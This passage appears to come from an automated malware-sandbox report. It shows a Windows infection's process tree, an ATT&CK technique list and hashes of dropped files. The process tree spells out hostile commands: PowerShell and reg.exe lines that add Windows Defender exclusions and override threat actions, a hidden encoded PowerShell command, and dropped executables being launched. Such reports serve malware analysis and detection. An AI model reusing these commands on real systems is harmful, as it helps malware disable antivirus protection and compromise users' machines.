                                                                                "C:\Users\Admin\AppData\Local\Temp\e39974eb-71d4-4162-a67c-d8e571eb5e6b\AdvancedRun.exe" /SpecialRun 4101d8 2312
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:2960
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\3kgAh8CzmmJSYseD5vX3fGDo.exe" -Force
                                                                              7⤵
                                                                                PID:1692
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force
                                                                                7⤵
                                                                                  PID:4636
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\3kgAh8CzmmJSYseD5vX3fGDo.exe" -Force
                                                                                  7⤵
                                                                                    PID:400
                                                                                  • C:\Users\Admin\Documents\3kgAh8CzmmJSYseD5vX3fGDo.exe
                                                                                    "C:\Users\Admin\Documents\3kgAh8CzmmJSYseD5vX3fGDo.exe"
                                                                                    7⤵
                                                                                      PID:1564
                                                                                  • C:\Users\Admin\Documents\Ij4SkpboDOCd5Oi0F38b9TrM.exe
                                                                                    "C:\Users\Admin\Documents\Ij4SkpboDOCd5Oi0F38b9TrM.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5108
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c timeout 45
                                                                                      7⤵
                                                                                        PID:1388
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout 45
                                                                                          8⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:620
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Ztfglzprim.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Ztfglzprim.exe"
                                                                                        7⤵
                                                                                          PID:4488
                                                                                        • C:\Users\Admin\Documents\Ij4SkpboDOCd5Oi0F38b9TrM.exe
                                                                                          C:\Users\Admin\Documents\Ij4SkpboDOCd5Oi0F38b9TrM.exe
                                                                                          7⤵
                                                                                            PID:4800
                                                                                        • C:\Users\Admin\Documents\bKcpqv_EHCJa1EWv9LLp8mNN.exe
                                                                                          "C:\Users\Admin\Documents\bKcpqv_EHCJa1EWv9LLp8mNN.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1600
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sahiba_6.exe
                                                                                      4⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:804
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\sahiba_6.exe
                                                                                        sahiba_6.exe
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3624
                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                1⤵
                                                                                • Process spawned unexpected child process
                                                                                PID:4964
                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                  2⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:392
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 600
                                                                                    3⤵
                                                                                    • Program crash
                                                                                    PID:3792
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2696 -ip 2696
                                                                                1⤵
                                                                                  PID:3984
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 392 -ip 392
                                                                                  1⤵
                                                                                    PID:2460
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3036 -ip 3036
                                                                                    1⤵
                                                                                      PID:3248
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1600 -ip 1600
                                                                                      1⤵
                                                                                        PID:4260
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2500 -ip 2500
                                                                                        1⤵
                                                                                          PID:4360
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3224 -ip 3224
                                                                                          1⤵
                                                                                            PID:1256
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2500 -ip 2500
                                                                                            1⤵
                                                                                              PID:1884
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1600 -ip 1600
                                                                                              1⤵
                                                                                                PID:1272
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3036 -ip 3036
                                                                                                1⤵
                                                                                                  PID:5004
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3224 -ip 3224
                                                                                                  1⤵
                                                                                                    PID:4248
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3036 -ip 3036
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:3432
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 3036 -ip 3036
                                                                                                    1⤵
                                                                                                      PID:2992
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3036 -ip 3036
                                                                                                      1⤵
                                                                                                        PID:3660
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3036 -ip 3036
                                                                                                        1⤵
                                                                                                          PID:3952
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3036 -ip 3036
                                                                                                          1⤵
                                                                                                            PID:4996
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3036 -ip 3036
                                                                                                            1⤵
                                                                                                              PID:3556
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3036 -ip 3036
                                                                                                              1⤵
                                                                                                                PID:4816
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                1⤵
                                                                                                                  PID:1180
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    2⤵
                                                                                                                      PID:1372
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                    1⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    PID:2472
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                    1⤵
                                                                                                                      PID:2220
                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                      1⤵
                                                                                                                        PID:484
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\TXDWXMI.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\TXDWXMI.exe j6 /site_id 525403 /S
                                                                                                                        1⤵
                                                                                                                          PID:488
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                            2⤵
                                                                                                                              PID:5052
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:1900
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                    4⤵
                                                                                                                                      PID:4268
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:4456
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:3180
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:552
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:3960
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:1564
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:5056
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:2444
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4828
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1736
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4628
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1924
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3200
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1708
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:1396
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1456
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4212
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1532
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:396
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3740
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:3112
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4932
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4036
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4672
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:868
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4440 -ip 4440
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:2960

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                Execution

                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                1
                                                                                                                                                                                T1053

                                                                                                                                                                                Persistence

                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                1
                                                                                                                                                                                T1031

                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                1
                                                                                                                                                                                T1053

                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                Bypass User Account Control

                                                                                                                                                                                1
                                                                                                                                                                                T1088

                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                1
                                                                                                                                                                                T1053

                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                Modify Registry

                                                                                                                                                                                4
                                                                                                                                                                                T1112

                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                3
                                                                                                                                                                                T1089

                                                                                                                                                                                Bypass User Account Control

                                                                                                                                                                                1
                                                                                                                                                                                T1088

                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                1
                                                                                                                                                                                T1497

                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                1
                                                                                                                                                                                T1130

                                                                                                                                                                                Credential Access

                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                4
                                                                                                                                                                                T1081

                                                                                                                                                                                Discovery

                                                                                                                                                                                Query Registry

                                                                                                                                                                                7
                                                                                                                                                                                T1012

                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                1
                                                                                                                                                                                T1497

                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                7
                                                                                                                                                                                T1082

                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                1
                                                                                                                                                                                T1120

                                                                                                                                                                                Process Discovery

                                                                                                                                                                                1
                                                                                                                                                                                T1057

                                                                                                                                                                                Collection

                                                                                                                                                                                Data from Local System

                                                                                                                                                                                4
                                                                                                                                                                                T1005

                                                                                                                                                                                Command and Control

                                                                                                                                                                                Web Service

                                                                                                                                                                                1
                                                                                                                                                                                T1102

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\libcurl.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\libcurl.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\libcurl.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8CE5649D\libcurlpp.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  e6e578373c2e416289a8da55f1dc5e8e

